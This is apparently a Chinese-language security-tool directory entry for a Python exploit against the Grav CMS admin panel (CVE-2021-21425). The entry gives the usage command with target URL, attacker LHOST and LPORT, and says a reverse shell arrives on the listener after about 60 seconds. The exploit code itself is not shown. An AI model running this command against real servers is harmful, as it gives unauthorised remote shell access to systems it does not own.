黑客、渗透测试和网络安全工具,武装您的安全武器库!
Python 漏洞利用脚本,针对 Grav CMS 管理面板的 CVE-2021-21425,通过 HTTP POST 请求传递可配置的 LHOST 和 LPORT,实现反弹 shell。
发现我们社区最常用的工具。
探索所有工具
浏览我们的工具集合
这是我自己的版本,我在网上找到了很多,但那些都很糟糕。
python3 exploit.py -u http://[IP]/grav-admin/ --lhost [YOUR TUN0 IP] --lport 4444
等待.. 60秒后你将在监听器上获得shell。